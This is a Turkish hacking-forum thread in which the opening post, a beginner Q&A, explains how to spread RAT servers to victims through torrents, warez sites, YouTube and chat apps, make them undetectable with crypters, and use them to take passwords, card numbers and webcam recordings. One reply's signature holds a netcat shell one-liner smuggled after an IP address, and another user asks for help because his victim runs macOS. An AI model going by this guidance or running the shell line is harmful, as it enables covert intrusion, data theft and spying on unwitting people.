THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

takipci
Seçenekler

RAT Yenilere -Soru Cevap Şeklinde.

DarkPasha - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2013
Nereden:
Microsoft®
Mesajlar:
427
Konular:
141
Teşekkür (Etti):
2
Teşekkür (Aldı):
125
Ticaret:
(0) %
9
1370
20-10-2013 16:39
#1
Soru-RAT Nedir?
Cevap-Rat aynı zamanda Remote Administrator Tool(Uzaktan Admin Olarak Kontrol) Olarak Adlandırılır.Genel olarak Kötü Amaçlı Kullanılır,Yani bilgisiyar kullanır gibi,Kişilerin bilgilerini çalmak,dosyalarını düzenlemek ve silmek gibi yönlerde kullanılabilir.Kurban bulmak için server dosyanızı karşı tarafa gönderip açmasını sağlamaktır.

Soru–
Spread Nasıl Yapılır?[Yaymak]
Cevap-RAT Servarlarınızı bir çok yol ile yayabilirsiniz.Aşşağıda belirteceğim yollar ile kurban kasabilirsiniz.
-P2P(PerToPer) Yani uTorrent,Pirate Bay Gibi çeşitli yollarla.
-Anlık Sohbet Alanı İçerisinde Yapılabilir Örneğin;
-Skype ,MSN, Aim Ve bir çok anlık görüşme yapabildiğiniz uygulamalar.



Soru - Kurban'ı Nasıl Control Ederim?
Cevap -Rat'ın Bilgisayarınızda kurulu olması gerekiyor.Rat client'i ile kurbanlarınızı kontrol edebilirsiniz.

Soru – RAT Kurmak İçin Ne Gerekli?
Cevap - Evet size Windows OS Sistemi Gereklidir,Tabikide Rat da kullanacağınız Port Modeminizin ara yüzüne girip açılması gereklidir.Google'da PortForwarding diye aratıp Modeminizi seçtikten sonra uygulamarı yaparak Portlarınızı açabilirsiniz.

Soru – Nasıl Port Açarım?
Cevap-Port açmak çok basittir ama RAT için çok önemlidir,Çünkü RAT'ın mantığı port üzerinedir,Rat port aracılığı ile bağlantı kurar ve firewall'ı bypass eder ve bağlantı kurulur.

Eğer port açmakta sıkıntı yaşayan olursa ÖM Atmaları Yeterli Olur Elimden Geldiğince Yardımcı Olabilirim.


Soru – Server'ımı Nasıl FUD Yaparım?
Cevap - Eğer Fud Server yapmak istiyorsanız,Sitemizin Crypter Bölümünde sürekli paylaşılan güncel fud crypterlar ile fud layabilirsiniz.Aynı Zamanda HackerToolv2(v3 yakında çıkacak) programı yardımıyla serverınızda hex editlemeleri yapıp kendinizi geliştirebilir ve fud yapabilirsiniz.


Soru – Kendi server'ımı açtım Nasıl Temizlerim?
Cevap -Öncelike Bağlantı aldıysanız eğer RAT'dan kendi bağlantınızı "uninstall" edebilirsiniz,Başka bir çözüm yolu ise Malware Anti Bytes , ve Anti Malware Programını kullanmaktır.
Kökten Çözüm ise Regedit'den Serverınızı silmektir.Bu işlemi yaparken görev yöneticisinden explorer.exe yi tamamen sonlandırmanız gerekiyor.


Soru –Yasal mı Değilmi?
Cevap - Evet bazı Rat lar yasal bazıları ise yasal değildir.Legal Ratlarda backdoor olmaz ve kişiler istedikleri zaman bağlantıyı kesebilirler ÖRN: TeamViewer .Yasal Olmayan ratlar genelde hack ve bilgi çalma işlerinde kullanılır.

Yasal Olanlar:
TeamViewer– Herhangi bir bilgisayara karşı tarafın izni ile kontrol edebilme.
UltraVNC – Uzaktan Destek İstek karşılığında kontrol yazılımıdır..
Ammyy Admin – Ammyy admin en çok güvenilir uzaktan kontrol yazılımıdır.Uzaktan yardım edebilir ve yönetebilirsiniz.
Mikogo – Mikogo online toplantı amacıyla kullanılabilir, Web Konferans & Uzaktan Kontrol Araçları. Ekranınızı aynı anda 10 kişi ile paylaşabileceğiniz bir yazılımdır.
Bu tarz programların yasal olma nedeni ise,Yapılacak kontrolün 2 kişi tarafından onaylanıp açılmasıdır.Bu yüzden herhangi bir olumsuz durum yoktur.

Yasal Olmayanlar:
Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat
DarkComet Rat

Neden Yasal Değil?
Yukarıdaki sorularda açıladığım gibi,Bu tarz programlar karşı tarafta port açar ve bu şekilde bağlantı kurulur,siz bunu yaptığınızda karşı tarafın ruhu duymaz ve insanların kişisel bilgilerine,şifrelerine,vs vs .İzinsiz ulaştığınızdan dolayı yasallıktan çıkar ve Illegal bir hal alır.

Soru – Nerde Ve Nasıl Server'ımı Yayarım?
Cevap– Yaymak için bir çok yol var.Bunlardan bir tanesi warez websiteleri, P2P Torrent Siteleri(uTorrent, Pirate bay), YouTube Gibi. Evet bir çok kişi spreadi otomatik programlarla yaparlar auto-spread gibi programlarla.Ama bu işin en verimli olacağı hal,Serverınızın fud olmasıdır.


Soru – DNS Host Nedir? (DOMAIN NAME SYSTEM)
Cevap - DNS,Domain Name System’in kısaltılmış şeklidir. Türkçe karşılığı ise Alan İsimlendirme Sistemi olarak bilinir.

DNS, 256 karaktere kadar büyüyebilen host isimlerini IP’ye çevirmek için kullanılan bir sistemdir. Host ismi,tümüyle tanımlanmış isim (full qualified name) olarak da bilinir ve hem bilgisayarın ismini hem de bilgisayarın bulunduğu Internet domainini gösterir. Örneğin murat.anadolu.com.tr ismi. Bu isimde ’anadolu.com.tr’ ifadesi internet domainini, ’murat’ ifadesi ise bu domaindeki tek bir makineyi belirtir. DNS , verilen bir makina adının IP adresini çözerek makinaların Internet üzerinde host isimleri ile haberleşmelerine olanak tanır.

DNS’in amacı nedir?

DNS, kolay anlaşılabilir ve kullanılabilir makine ve alan isimleri ile makine IP adresleri arasında çift taraflı dönüşümü sağlar. IP adreslerinin gündelik hayatta kullanımı ve hatırlanması pek pratik olmadığı için domain isimlendirme sistemi kullanılır. Ana amacı, ağ uzerinden gelen alan adı veya IPnumarası ile ilgili sorgulamalara yanıt vermektir. Bu amaç için cok yaygın olarak \\”Berkeley Internet Name Domain (BIND)\\” yazılımı kullanılmaktadır. Siz bir siteye erişmek istediğinizde, DNS sayesinde hangi site nerde , hangi IP hangi bilğisayara ait olduğu belirlenir, ve istediğiniz yere erişirsiniz.


Soru – RAT ile neler yapabilirim?
Cevap – Yapabileceklerinizin Listesi:
• Dosya Yönetimi
• Web tarayıcısı Kontrolü(Site Açtırma,Başlangıç Sitesini Değiştirmek.)
• Sistem bilgilerini alma(OS Versiyon,Hangi Antiyi Kullanıyor?, Ram Memory,Bilgisayar ismi Gibi.)
• Şifreleri alma, kredi kart numaralarını almak veya özel bilgileri almak.
• Bilgisayar ekran görüntüsünü görmek ve kontrol edebilme.
• Kamera Ve Ses Kaydı Yaoabilme
• Mouse kontrolü
• Silme, Değiştirme,İndirme, Yükleme veya dosyaların yerini değiştirme gibi.
--------------------- # _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.

Konu DarkPasha tarafından (26-10-2013 03:09 Saat 03:09 ) değiştirilmiştir.
azda22, oney31 Teşekkür etti.
musti0120 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2012
Mesajlar:
179
Konular:
41
Teşekkür (Etti):
72
Teşekkür (Aldı):
1
Ticaret:
(0) %
25-10-2013 18:59
#2
ben port acamıyorum bi yardımcı olurmsn tp lik td854w
Trinty - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Nereden:
Bileceksiniz
Yaş:
25
Mesajlar:
1.302
Konular:
100
Teşekkür (Etti):
147
Teşekkür (Aldı):
252
Ticaret:
(0) %
25-10-2013 19:00
#3
Eline sağlık darkcomet yasalmı ?
--------------------- Yazacak bişe bulamadım
yakamoz9898 Teşekkür etti.
db43 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
799
Konular:
51
Teşekkür (Etti):
13
Teşekkür (Aldı):
114
Ticaret:
(0) %
25-10-2013 21:10
#4
Port açmakla firewall'ı bypass etmenin arasında bir bağlantı yok nasıl web server 80'inci portu kullanıyorsa RAT da o portu kullanıyor.Bypass etmenin asıl mantığı saldırganın bilgisayarının değil kurbanın bilgisayarının bağlantıyı kurmasıdır.
--------------------- Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
Black Mamba - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
İstanbul
Yaş:
44
Mesajlar:
2.056
Konular:
44
Teşekkür (Etti):
174
Teşekkür (Aldı):
207
Ticaret:
(0) %
25-10-2013 22:13
#5
darkcomet'i unutmuşsun onu rattan saymıyonmu yoksa yaralı konu egitici ..
---------------------
DarkPasha - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2013
Nereden:
Microsoft®
Mesajlar:
427
Konular:
141
Teşekkür (Etti):
2
Teşekkür (Aldı):
125
Ticaret:
(0) %
26-10-2013 03:10
#6
konumu okuyan birilerini bulmak güzel
--------------------- # _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.

Italo - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2013
Nereden:
Tahtalı Köy
Mesajlar:
229
Konular:
35
Teşekkür (Etti):
4
Teşekkür (Aldı):
23
Ticaret:
(0) %
26-10-2013 09:58
#7
(Yeniler İçin.) İyi Anlatım.
--------------------- Bügün Küçük Uygulamalar Yarın Büyük İşletim Sistemleri!
Gönüllü Aranıyor.RpS_smile:
crayzhacker - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
11/2007
Nereden:
Paris
Mesajlar:
260
Konular:
38
Teşekkür (Etti):
69
Teşekkür (Aldı):
18
Ticaret:
(0) %
31-10-2013 07:19
#8
Teşekurler eline saglık
hykocanm - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2015
Mesajlar:
10
Konular:
2
Teşekkür (Etti):
4
Teşekkür (Aldı):
0
Ticaret:
(0) %
25-06-2015 10:05
#9
Merhabalar ben çok enteresan bir olayla ile karşılaştım programım sorunsuz calısmakta fud vs herşeyim tastamam fakat kurbanımın bilgisayarının işletim sistemi mac. cıktı bu durumda ne yapmam gerek ?
crazzybaron - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2015
Mesajlar:
9
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
25-06-2015 10:44
#10
teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler